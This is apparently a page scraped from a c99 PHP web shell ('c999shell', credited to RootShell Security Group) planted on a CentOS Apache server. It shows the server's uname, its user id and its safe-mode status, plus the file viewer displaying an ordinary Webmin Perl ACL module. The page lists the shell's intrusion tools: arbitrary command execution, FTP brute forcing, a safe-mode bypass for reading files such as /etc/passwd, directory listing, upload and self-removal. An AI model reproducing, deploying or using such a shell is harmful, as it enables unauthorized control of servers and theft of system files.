!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/passwd/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     acl_security.pl (3.98 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

require 'passwd-lib.pl';

# acl_security_form(&options)
# Output HTML for editing security options for the passwd module
sub acl_security_form
{
print "<tr> <td valign=top><b>$text{'acl_users'}</b></td> <td colspan=3>\n";
printf "<input type=radio name=mode value=0 %s> %s\n",
    $_[0]->{'mode'} == 0 ? 'checked' : '', $text{'acl_mode0'};

printf "<input type=radio name=mode value=3 %s> %s<br>\n",
    $_[0]->{'mode'} == 3 ? 'checked' : '', $text{'acl_mode3'};

printf "<input type=radio name=mode value=1 %s> %s\n",
    $_[0]->{'mode'} == 1 ? 'checked' : '', $text{'acl_mode1'};
printf "<input name=users1 size=40 value='%s'> %s<br>\n",
    $_[0]->{'mode'} == 1 ? $_[0]->{'users'} : '',
    &user_chooser_button("users1", 1);

printf "<input type=radio name=mode value=2 %s> %s\n",
    $_[0]->{'mode'} == 2 ? 'checked' : '', $text{'acl_mode2'};
printf "<input name=users2 size=40 value='%s'> %s<br>\n",
    $_[0]->{'mode'} == 2 ? $_[0]->{'users'} : '',
    &user_chooser_button("users2", 1);

printf "<input type=radio name=mode value=4 %s> %s\n",
    $_[0]->{'mode'} == 4 ? 'checked' : '', $text{'acl_mode4'};
printf "<input name=low size=8 value='%s'> -\n",
    $_[0]->{'mode'} == 4 ? $_[0]->{'low'} : '';
printf "<input name=high size=8 value='%s'><br>\n",
    $_[0]->{'mode'} == 4 ? $_[0]->{'high'} : '';

printf "<input type=radio name=mode value=5 %s> %s\n",
    $_[0]->{'mode'} == 5 ? 'checked' : '', $text{'acl_mode5'};
printf "<input name=groups size=20 value='%s'> %s<br>\n",
    $_[0]->{'mode'} == 5 ? $_[0]->{'users'} : '',
    &group_chooser_button("groups", 1);
printf "%s <input type=checkbox name=sec value=1 %s> %s<br>\n",
        "&nbsp;" x 5, $_[0]->{'sec'} ? 'checked' : '',$text{'acl_sec'};
printf "%s %s <input name=notusers size=20 value='%s'> %s<br>\n",
    "&nbsp;" x 5, $text{'acl_notusers'},
    $_[0]->{'mode'} == 5 ? $_[0]->{'notusers'} : '',
    &user_chooser_button("notusers", 1);

printf "<input type=radio name=mode value=6 %s> %s\n",
    $_[0]->{'mode'} == 6 ? 'checked' : '', $text{'acl_mode6'};
printf "<input name=match size=15 value='%s'></td> </tr>\n",
    $_[0]->{'mode'} == 6 ? $_[0]->{'users'} : '';

print "<tr> <td><b>$text{'acl_repeat'}</b></td> <td colspan=3>\n";
printf "<input type=radio name=repeat value=1 %s> $text{'yes'}\n",
    $_[0]->{'repeat'} ? "checked" : "";
printf "<input type=radio name=repeat value=0 %s> $text{'no'}</td> </tr>\n",
    $_[0]->{'repeat'} ? "" : "checked";

print "<tr> <td><b>$text{'acl_expire'}</b></td> <td colspan=3>\n";
printf "<input type=radio name=expire value=1 %s> $text{'yes'}\n",
    $_[0]->{'expire'} ? "checked" : "";
printf "<input type=radio name=expire value=0 %s> $text{'no'}</td> </tr>\n",
    $_[0]->{'expire'} ? "" : "checked";

print "<td><b>$text{'acl_others'}</b></td> <td colspan=3>\n";
printf "<input type=radio name=others value=1 %s> $text{'yes'}\n",
    $_[0]->{'others'} == 1 ? "checked" : "";
printf "<input type=radio name=others value=2 %s> $text{'acl_opt'}\n",
    $_[0]->{'others'} == 2 ? "checked" : "";
printf "<input type=radio name=others value=0 %s> $text{'no'}</td> </tr>\n",
    $_[0]->{'others'} == 0 ? "checked" : "";

print "<tr> <td><b>$text{'acl_old'}</b></td> <td colspan=3>\n";
printf "<input type=radio name=old value=1 %s> $text{'yes'}\n",
    $_[0]->{'old'} == 1 ? "checked" : "";
printf "<input type=radio name=old value=2 %s> $text{'acl_old_this'}\n",
    $_[0]->{'old'} == 2 ? "checked" : "";
printf "<input type=radio name=old value=0 %s> $text{'no'}</td> </tr>\n",
    $_[0]->{'old'} == 0 ? "checked" : "";
}

# acl_security_save(&options)
# Parse the form for security options for the bind8 module
sub acl_security_save
{
$_[0]->{'mode'} = $in{'mode'};
$_[0]->{'users'} = $in{'mode'} == 1 ? $in{'users1'} :
           $in{'mode'} == 2 ? $in{'users2'} :
           $in{'mode'} == 5 ? $in{'groups'} :
           $in{'mode'} == 6 ? $in{'match'} : undef;
$_[0]->{'notusers'} = $in{'mode'} == 5 ? $in{'notusers'} : undef;
$_[0]->{'low'} = $in{'low'};
$_[0]->{'high'} = $in{'high'};
$_[0]->{'repeat'} = $in{'repeat'};
$_[0]->{'old'} = $in{'old'};
$_[0]->{'others'} = $in{'others'};
$_[0]->{'expire'} = $in{'expire'};
$_[0]->{'sec'} = $in{'sec'};
}


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--